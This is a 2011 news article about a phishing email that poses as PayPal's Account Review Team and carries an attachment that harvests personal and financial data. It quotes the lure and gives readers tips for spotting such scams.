How do you react to an email that informs you of illegal transactions made with your card?

Nov 7, 2011 11:08 GMT  ·  By

PayPal's name and reputation are utilized by cybercriminals in the latest phishing expedition that's set out to steal the accounts of internauts. The latest scam masks itself as a notification coming from the PayPal Account Review Team which informs the customer on a credit card issue.

According to Sophos, the message alerts the potential victims of a credit card charge that has been blocked by their system since it was unusual.

“An intrusion into your account has been detected which shows that someone tried to access your PayPal account without your permission. We have limited access to your account due to this problem. Moreover, we have sent you an attachment which contains all the necessary steps in order to restore your account access. Please download and open it in your browser,” reads the phish.

Once the attachment is opened, it reveals a form that replicates a PayPal page in which the user is urged to enter personal information such as name, date of birth, social security number, phone and other sensitive data that in the end will help the crooks get the contents of a bank account.

PayPal does send notification emails, but they never contain attachments, so this is a good thing to lookout for when receiving such messages.

Also, take a good look at the email address of the sender. In many cases, such as in this one, it gives away the true identity of a scam.

The typos, the grammar errors and sometimes the poor design of a website can reveal the fact that an alert which seems to be coming from a legitimate company is actually a hoax.

Finally, to make sure you're protected against these malevolent operations, install a decent security software. In most situations, the products offered by security vendors will quickly identify and contain these attempts.